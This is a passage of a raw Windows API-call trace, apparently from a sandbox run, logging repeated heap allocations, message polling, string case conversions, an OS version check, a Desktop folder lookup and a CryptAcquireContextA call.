RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0090.854] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ED 0nXQ VIkUvYr6", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 0x9a3bc0 [0090.854] FindClose (in: hFindFile=0x9a3bc0 | out: hFindFile=0x9a3bc0) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0090.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.854] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0090.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.856] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.856] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.856] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.856] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.856] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.857] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0090.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.858] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.858] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.858] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.858] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.858] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.859] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.859] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0090.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0090.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.859] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.859] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.859] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.859] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.859] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.860] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0090.860] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.861] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.861] 